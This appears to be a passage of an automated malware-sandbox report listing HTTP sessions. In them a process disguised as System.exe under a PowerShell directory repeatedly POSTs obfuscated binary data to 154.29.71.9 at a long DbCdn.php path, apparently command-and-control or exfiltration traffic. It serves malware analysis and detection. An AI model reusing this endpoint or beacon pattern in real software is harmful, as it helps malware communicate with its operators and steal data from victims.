                                                                                                    Data Ascii: Y\]X^^XS[YZUP\[ZV\TBRYR[U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:;9Z&8"T=([+[,';'8.W5-/"-*> 10'-/"Y ']/4
                                                                                                    Jan 4, 2025 14:53:28.281449080 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:28.410166979 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:28 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    90192.168.2.449993154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:28.539103031 CET371OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Jan 4, 2025 14:53:28.895407915 CET2600OUTData Raw: 59 58 58 51 5b 5e 58 51 5b 59 5a 55 50 59 5b 56 56 51 54 45 52 51 52 5a 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: YXXQ[^XQ[YZUPY[VVQTERQRZU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:,>6$("U>.++$( /U2T5=#P"(!U(=?$3 9"Y ']/
                                                                                                    Jan 4, 2025 14:53:29.064785957 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:29.199867010 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:29 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    91192.168.2.450000154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:29.320314884 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2596
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:29.676831007 CET2596OUTData Raw: 5c 5d 5d 5f 5e 5e 5d 51 5b 59 5a 55 50 58 5b 55 56 56 54 41 52 59 52 59 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \]]_^^]Q[YZUPX[UVVTARYRYU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9,%(:V=0(T3+/= .,!^5W(.&37-"Y ']/<
                                                                                                    Jan 4, 2025 14:53:29.856415987 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:30.003753901 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:29 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    92192.168.2.450002154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:30.309426069 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:30.661416054 CET2600OUTData Raw: 5c 5e 5d 58 5b 5a 58 5c 5b 59 5a 55 50 5e 5b 50 56 5d 54 49 52 50 52 5a 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \^]X[ZX\[YZUP^[PV]TIRPRZU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9Z8X*1;2W?-'<='T'+/,#2P -'W58*=(@%U+/?"Y ']/<
                                                                                                    Jan 4, 2025 14:53:30.936518908 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:31.066277981 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:30 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    93192.168.2.450008154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:31.195974112 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    94192.168.2.450012154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:31.505256891 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 1876
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:31.863778114 CET1876OUTData Raw: 59 5d 58 5b 5e 5f 58 57 5b 59 5a 55 50 51 5b 54 56 53 54 43 52 5f 52 5f 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: Y]X[^_XW[YZUPQ[TVSTCR_R_U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9Z.>-[$;1>='<.;$]38U&U .3P6) D&U4]//"Y ']/
                                                                                                    Jan 4, 2025 14:53:32.040996075 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:32.174026966 CET349INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:31 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 39 38 0d 0a 0f 11 21 02 25 00 26 1c 25 13 3f 0f 39 2c 2a 09 3f 0e 21 1b 38 3d 33 00 28 29 20 04 2f 33 3b 13 3d 28 08 0b 2a 08 3c 09 25 2c 24 5c 3c 1c 20 51 03 12 24 03 24 29 2a 5b 3d 55 3a 06 2c 3d 30 05 35 08 23 13 26 14 32 12 20 2d 25 5a 25 06 22 0f 29 3f 29 54 3a 58 3c 00 2e 1d 01 0d 28 3f 23 55 0b 1f 25 1f 30 31 2b 0e 26 5e 34 11 2b 0e 30 5f 2b 03 24 0f 20 29 38 12 31 07 2a 5e 30 31 21 1d 33 31 0b 5e 24 20 22 03 36 3d 2c 01 27 3a 2e 53 2e 01 2d 57 00 3d 59 4c 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 98!%&%?9,*?!8=3() /3;=(*<%,$\< Q$$)*[=U:,=05#&2 -%Z%")?)T:X<.(?#U%01+&^4+0_+$ )81*^01!31^$ "6=,':.S.-W=YL0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    95192.168.2.450014154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:31.649960041 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:32.004615068 CET2600OUTData Raw: 59 59 58 5e 5b 5f 58 54 5b 59 5a 55 50 59 5b 51 56 5d 54 45 52 5c 52 5b 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: YYX^[_XT[YZUPY[QV]TER\R[U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9_/X&&;!*4+[/V',,3!!*(.4& ?-"Y ']/
                                                                                                    Jan 4, 2025 14:53:32.182209015 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:32.313163042 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:32 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    96192.168.2.450020154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:32.486495018 CET371OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Jan 4, 2025 14:53:32.833718061 CET2600OUTData Raw: 59 5a 58 5a 5e 5c 58 53 5b 59 5a 55 50 5f 5b 57 56 50 54 43 52 59 52 5b 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: YZXZ^\XS[YZUP_[WVPTCRYR[U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9,-:1=*=;?=;V%+[8&P685^5P)4E2$\-/"Y ']/
                                                                                                    Jan 4, 2025 14:53:33.022016048 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:33.153814077 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:32 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    97192.168.2.450023154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:33.331659079 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:33.676403046 CET2600OUTData Raw: 59 5c 58 5d 5e 5c 58 50 5b 59 5a 55 50 5e 5b 55 56 5c 54 48 52 5e 52 5a 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: Y\X]^\XP[YZUP^[UV\THR^RZU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9Y,:$(.>.(Y).0%+?.3 .,!(5V>>@1-"Y ']/<
                                                                                                    Jan 4, 2025 14:53:33.885107994 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:34.092838049 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:34 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    98192.168.2.450028154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:34.235074997 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:34.582551003 CET2600OUTData Raw: 59 5f 58 5c 5b 5d 5d 54 5b 59 5a 55 50 59 5b 57 56 56 54 44 52 50 52 5d 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: Y_X\[]]T[YZUPY[WVVTDRPR]U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9.=9Y1%?.4?=';/3=5'P!(5>$$37-"Y ']/
                                                                                                    Jan 4, 2025 14:53:34.776689053 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:34.915107965 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:34 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    99192.168.2.450034154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:35.055258036 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:35.410706043 CET2600OUTData Raw: 5c 59 5d 5b 5b 55 58 54 5b 59 5a 55 50 5e 5b 5a 56 55 54 40 52 5c 52 50 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: \Y][[UXT[YZUP^[ZVUT@R\RPU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9;9[%(V>-0(.'V3?,U!";"!(.+%#'-/"Y ']/<
                                                                                                    Jan 4, 2025 14:53:35.710746050 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:35.841968060 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:35 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    100192.168.2.450040154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:36.074464083 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:36.426332951 CET2600OUTData Raw: 59 5b 5d 58 5b 5f 5d 56 5b 59 5a 55 50 5d 5b 51 56 53 54 42 52 5b 52 5f 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: Y[]X[_]V[YZUP][QVSTBR[R_U[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\:,.)1+%=.<Y(=+'+;#5")82U([//"Y ']/0
                                                                                                    Jan 4, 2025 14:53:36.712251902 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:36.746999979 CET200INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:36 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
                                                                                                    Data Raw: 34 0d 0a 3d 59 5b 54 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 4=Y[T0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    101192.168.2.450045154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:36.868362904 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 2600
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    102192.168.2.450051154.29.71.9805796C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Jan 4, 2025 14:53:37.182518005 CET395OUTPOST /eternalCpuImage/PublicTo7Poll/BetterPacketWindowsApi/83/asyncPublicvideo6/7protect/6Linux/TracklowBigload/sqlVoiddbprivateTraffic/PublicDlelongpoll/DbCdn.php HTTP/1.1
                                                                                                    Content-Type: application/octet-stream
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                    Host: 154.29.71.9
                                                                                                    Content-Length: 1856
                                                                                                    Expect: 100-continue
                                                                                                    Connection: Keep-Alive
                                                                                                    Jan 4, 2025 14:53:37.535873890 CET1856OUTData Raw: 59 5a 5d 5f 5b 5b 5d 51 5b 59 5a 55 50 59 5b 5a 56 5c 54 49 52 58 52 51 55 5b 5d 5e 52 52 5c 5b 43 59 55 42 52 54 55 5a 5e 5a 5f 5b 56 50 5a 5e 50 5a 5d 5c 58 58 50 51 57 52 56 5d 55 5b 53 43 5c 50 41 5b 5b 5b 58 5e 59 58 5b 5f 58 5e 5f 5c 51 5a
                                                                                                    Data Ascii: YZ]_[[]Q[YZUPY[ZV\TIRXRQU[]^RR\[CYUBRTUZ^Z_[VPZ^PZ]\XXPQWRV]U[SC\PA[[[X^YX[_X^_\QZ^WU[\_VSSQB_YP]P_QYPBT^ZBPUQB_U_TTXZ_\]XT]Z]CSZQ[^ZR__Z[YY[\TUTYTWPVZIF[BTSZQP_ZQ\P__WX]Q[_YUW]Z\SGZT\9Y/=![2">(+['0(8Y,3.Q -Q!^9U=<C204Y.?"Y ']/
                                                                                                    Jan 4, 2025 14:53:37.709362030 CET25INHTTP/1.1 100 Continue
                                                                                                    Jan 4, 2025 14:53:37.843972921 CET349INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Date: Sat, 04 Jan 2025 13:53:37 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Vary: Accept-Encoding
